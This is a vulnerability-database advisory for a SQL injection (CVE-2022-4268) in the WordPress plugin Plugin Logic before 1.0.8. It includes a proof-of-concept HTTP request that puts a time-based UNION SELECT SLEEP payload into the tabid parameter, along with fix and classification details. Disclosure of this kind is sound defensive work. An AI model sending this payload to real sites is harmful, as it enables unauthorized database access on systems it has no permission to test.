WordPress Plugin Vulnerabilities

Plugin Logic < 1.0.8 - Admin+ SQLi

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

Proof of Concept

POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%20union%20SELECT%20SLEEP(16)%3b%23 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Cookie: [admin+]

plulo_checklist%5B0%5D=0&plulo_checklist%5B0%5D=1&plulo_radiolist%5B0%5D=0&plulo_txt_list%5B0%5D=&plulo_submit=Save+Changes

Affects Plugins

Plugin icon
plugin-logic
Fixed in 1.0.8

References

CVE
CVE-2022-4268
URL
https://bulletin.iese.de/post/plugin-logic_1-0-7/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Submitter
Kunal Sharma
Submitter website
https://iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
bde93d90-1178-4d55-aea9-e02c4f8bcaa2

Timeline

Publicly Published
2022-12-02 (about 1 years ago)
Added
2022-12-02 (about 1 years ago)
Last Updated
2023-03-06 (about 1 years ago)

Other

Published
Title
Published
2023-02-27
Title
Paid Memberships Pro < 2.9.12 - Subscriber+ SQL Injection
Published
2022-08-30
Title
WP < 6.0.2 - SQLi via Link API
Published
2023-04-06
Title
Transbank Webpay REST < 1.6.7 - Admin+ SQLi
Published
2023-11-23
Title
Porto Theme - Functionality < 2.12.1 - Unauthenticated SQL Injection
Published
2023-10-30
Title
Jquery accordion slideshow < 8.2 - Authenticated (Subscriber+) SQL Injection via Shortcode